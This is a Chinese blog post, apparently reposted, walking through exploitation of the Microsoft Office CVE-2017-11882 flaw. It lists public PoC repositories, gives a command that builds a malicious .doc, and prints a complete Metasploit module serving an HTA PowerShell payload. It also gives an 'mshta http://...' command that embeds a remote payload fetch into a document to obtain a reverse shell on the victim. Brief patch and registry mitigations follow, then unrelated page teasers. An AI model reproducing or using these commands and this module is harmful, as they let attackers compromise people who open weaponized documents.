Office遠程代碼執(zhí)行漏洞(CVE-2017-11882)復現(xiàn)

轉載:
撰寫人:fox-yu http://www.cnblogs.com/fox-yu/
昨晚看到的有復現(xiàn)的文章民宿,一直到今天才去自己復現(xiàn)了一遍,還是例行記錄一下杜耙。

POC:
https://github.com/Ridter/CVE-2017-11882/
一席爽、簡單的生成彈計算器的doc文件凌外。

網(wǎng)上看到的改進過的POC,我們直接拿來用烟馅,命令如下:

#python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
生成的doc文件直接打開就可以彈出計算器说庭。

image.png

影響的腳本:

    Office 365
    Microsoft Office 2000      
    Microsoft Office 2003      
    Microsoft Office 2007 Service Pack 3
    Microsoft Office 2010 Service Pack 2
    Microsoft Office 2013 Service Pack 1
    Microsoft Office 2016

復制代碼
二、生成可以反彈shell的doc文件

這里我們用到MSF郑趁, 添加EXP腳本刊驴,進入/usr/share/metasploit-framework/modules/exploits/windows/,新建一個office文件夾,把以下的代碼保存為ps_shell.rb捆憎。

EXP腳本

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule  < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info  = {})
    super(update_info(info,
      'Name' => 'Microsoft Office Payload Delivery',
      'Description' => %q{
        This module generates an command to place within
        a word document, that when executed, will retrieve a HTA payload
        via HTTP from an web server. Currently have not figured out how
        to generate a doc.
      },
      'License' => MSF_LICENSE,
      'Arch' => ARCH_X86,
      'Platform' => 'win',
      'Targets' =>
        [
          ['Automatic', {} ],
        ],
      'DefaultTarget' => 0,
    ))
  end

  def on_request_uri(cli, _request)
    print_status("Delivering payload")
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      'win',
      p.encoded,
      'hta-psh',
      { :arch => ARCH_X86, :platform => 'win '}
    )
    send_response(cli, data, 'Content-Type' => 'application/hta')
  end


  def primer
    url = get_uri
    print_status("Place the following DDE in an MS document:")
    print_line("mshta.exe \"#{url}\"")
  end
end

保存之后如下:


image.png

之后我們進入msf控制臺舅柜,選擇好payload并且設置好ip和生成的hta文件路徑。


image.png

然后利用上面的POC將生成的hta文件放到doc文件里躲惰。

#python Command109b_CVE-2017-11882.py -c "mshta http://192.168.49.142:8080/123" -o test123.doc

將生成的test123.doc文件放到目標機里打開致份,成功返回shell。


image.png

修復建議:

1.下載微軟對此漏洞補洞〔Α:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882氮块,并且開啟自動更新功能
2.在注冊表中禁用該漏洞模塊:

reg add “HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400

reg add “HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD/d 0x400

最后放幾個GitHub上面的POC:

https://github.com/starnightcyber/CVE-2017-11882

https://github.com/embedi/CVE-2017-11882

https://github.com/Ridter/CVE-2017-11882/

笨鳥先飛早入林,笨人勤學早成材诡宗。

最后編輯于
?著作權歸作者所有,轉載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末滔蝉,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子塔沃,更是在濱河造成了極大的恐慌蝠引,老刑警劉巖,帶你破解...
    沈念sama閱讀 206,126評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件蛀柴,死亡現(xiàn)場離奇詭異螃概,居然都是意外死亡,警方通過查閱死者的電腦和手機名扛,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,254評論 2 382
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來茧痒,“玉大人肮韧,你說我怎么就攤上這事⊥” “怎么了弄企?”我有些...
    開封第一講書人閱讀 152,445評論 0 341
  • 文/不壞的土叔 我叫張陵,是天一觀的道長区拳。 經(jīng)常有香客問我拘领,道長,這世上最難降的妖魔是什么樱调? 我笑而不...
    開封第一講書人閱讀 55,185評論 1 278
  • 正文 為了忘掉前任约素,我火速辦了婚禮,結果婚禮上笆凌,老公的妹妹穿的比我還像新娘圣猎。我一直安慰自己,他們只是感情好乞而,可當我...
    茶點故事閱讀 64,178評論 5 371
  • 文/花漫 我一把揭開白布送悔。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪欠啤。 梳的紋絲不亂的頭發(fā)上荚藻,一...
    開封第一講書人閱讀 48,970評論 1 284
  • 那天,我揣著相機與錄音洁段,去河邊找鬼应狱。 笑死,一個胖子當著我的面吹牛眉撵,可吹牛的內(nèi)容都是我干的侦香。 我是一名探鬼主播,決...
    沈念sama閱讀 38,276評論 3 399
  • 文/蒼蘭香墨 我猛地睜開眼纽疟,長吁一口氣:“原來是場噩夢啊……” “哼罐韩!你這毒婦竟也來了?” 一聲冷哼從身側響起污朽,我...
    開封第一講書人閱讀 36,927評論 0 259
  • 序言:老撾萬榮一對情侶失蹤散吵,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后蟆肆,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體矾睦,經(jīng)...
    沈念sama閱讀 43,400評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 35,883評論 2 323
  • 正文 我和宋清朗相戀三年炎功,在試婚紗的時候發(fā)現(xiàn)自己被綠了枚冗。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 37,997評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡蛇损,死狀恐怖赁温,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情淤齐,我是刑警寧澤股囊,帶...
    沈念sama閱讀 33,646評論 4 322
  • 正文 年R本政府宣布,位于F島的核電站更啄,受9級特大地震影響稚疹,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜祭务,卻給世界環(huán)境...
    茶點故事閱讀 39,213評論 3 307
  • 文/蒙蒙 一内狗、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧义锥,春花似錦其屏、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,204評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春蛤袒,著一層夾襖步出監(jiān)牢的瞬間熄云,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,423評論 1 260
  • 我被黑心中介騙來泰國打工妙真, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留缴允,地道東北人。 一個月前我還...
    沈念sama閱讀 45,423評論 2 352
  • 正文 我出身青樓珍德,卻偏偏與公主長得像练般,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子锈候,可洞房花燭夜當晚...
    茶點故事閱讀 42,722評論 2 345

推薦閱讀更多精彩內(nèi)容

  • Android 自定義View的各種姿勢1 Activity的顯示之ViewRootImpl詳解 Activity...
    passiontim閱讀 171,498評論 25 707
  • 一點一點地薄料,貝多芬的A大調(diào)第七交響曲第二樂章的小快板旋律就爬滿了全身…… 該醒了,……可我沒有在睡啊……當小提琴聲...
    Secant閱讀 827評論 0 4
  • 夜深了泵琳。來聊點刺激的摄职。 關于生死,還有鬼的获列。 膽小莫入谷市。 比起執(zhí)子之手,與子攜老击孩。我更喜歡前一...
    范范A閱讀 719評論 2 3
  • 工作幾個月后才對畢業(yè)這件事后知后覺。 同學大多留在珠海巩梢,廣州创泄,一部分去了深圳。 一開始我的心儀城市是廈門且改。 環(huán)境好...
    來日方長的那個方長閱讀 577評論 3 1
  • 「小山羊找朋友」 小山羊和小雞做朋友验烧。小雞請小山羊吃小蟲板驳。小山羊說:“謝謝你又跛!我不吃小蟲∪糁危” 小山羊和小貓做朋友慨蓝。...
    林夏薩摩閱讀 5,283評論 2 6